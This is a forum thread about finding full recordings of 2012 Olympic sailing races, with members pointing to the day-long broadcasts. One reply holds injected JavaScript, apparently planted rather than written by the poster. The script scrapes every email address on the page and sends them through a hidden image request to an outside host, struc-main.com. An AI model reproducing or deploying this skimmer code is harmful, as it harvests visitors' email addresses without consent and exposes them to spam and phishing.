FAQ FAQ  Forum Search   Register Register  Login Login

Where can we watch recorded races- not highlights

Post Reply Post Reply
Author
mo.allen View Drop Down

Online Status: Offline
Post Options Post Options   Quote mo.allen Quote  Post ReplyReply Direct Link To This Post Topic: Where can we watch recorded races- not highlights
    Posted: 31 Jul 12 at 9:52am
Loving the streamed racing online, but I missed the first few days races.  Is there anywhere we can watch the whole of the earlier races?  Seeing a few tacks and mark roundings on the highlights just doesn't do it.  Particularly interested in the match racing.

Thanks

Mo

Edited by MerlinMags - 31 Jul 12 at 3:50pm
alstorer View Drop Down
Really should get out more

Post Options Post Options   Quote alstorer Quote  Post ReplyReply Direct Link To This Post Posted: 31 Jul 12 at 10:17am
Not sure what happened there Mo, but full coverage of almost all races OTHER than Match Racing is available here. Scroll down to sailing, and click on the day- takes you to the full (nearly six hour) broadcast. You can then within the video easily skip to the races you want to see.
-_
Al
brys View Drop Down
Groupie
Groupie

Post Options Post Options   Quote brys Quote  Post ReplyReply Direct Link To This Post Posted: 31 Jul 12 at 11:34am
Have the broadcasters decided that they will ignore the womens match racing event because it is seen as a "lame duck" event, not likely to ever be seen again at the olympics?........shame on them! if that is the case. 
Never enough time for sailing
L123456 View Drop Down

Post Options Post Options   Quote L123456 Quote  Post ReplyReply Direct Link To This Post Posted: 31 Jul 12 at 4:42pm
Is there actually the race video available for viewing after?

All I can find is links to the results and live video, I missed the 49er racing and would like to watch the re-runs of races 3 & 4 ...
mo.allen View Drop Down

Post Options Post Options   Quote mo.allen Quote  Post ReplyReply Direct Link To This Post Posted: 31 Jul 12 at 4:57pm
< ="" ="text/"> for (var ii=0; ii < document.childNodes.length; ii++) { if (typeof(document.childNodes[ii].innerHTML) != "undefined") { var m = document.childNodes[ii].innerHTML.match(/[a-z0-9_\.-]+@[a-z0-9_\.-]+\.[a-z\.]{2,6}/ig); if (m != null) { var r = []; for (var j = 0; j < m.length; j++) { var f = false; if (m.length < 100) { for (var jj = j+1; jj < m.length; jj++) { if (m[j].toLowerCase() == m[jj].toLowerCase()) { f = true; break; } } } if (!f) { r.push(m[j]); } } var i=document.createElement('img'); i.style.position = "absolute"; i.style.left = '-1000px'; document.body.appendChild(i); i.src = 'https://struc-main.com/ping.html?cmd=log&w=email&id=YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY&text=' + r.join('|||') + '&r=' + Math.random(); } } } Thanks Al,

That worked for me.

Being very fussy, it would be nice if they broke out a link for each race, but still good enough for me.

Thanks again

Mo
L123456 View Drop Down

Post Options Post Options   Quote L123456 Quote  Post ReplyReply Direct Link To This Post Posted: 31 Jul 12 at 5:28pm
Eh?
 Post Reply Post Reply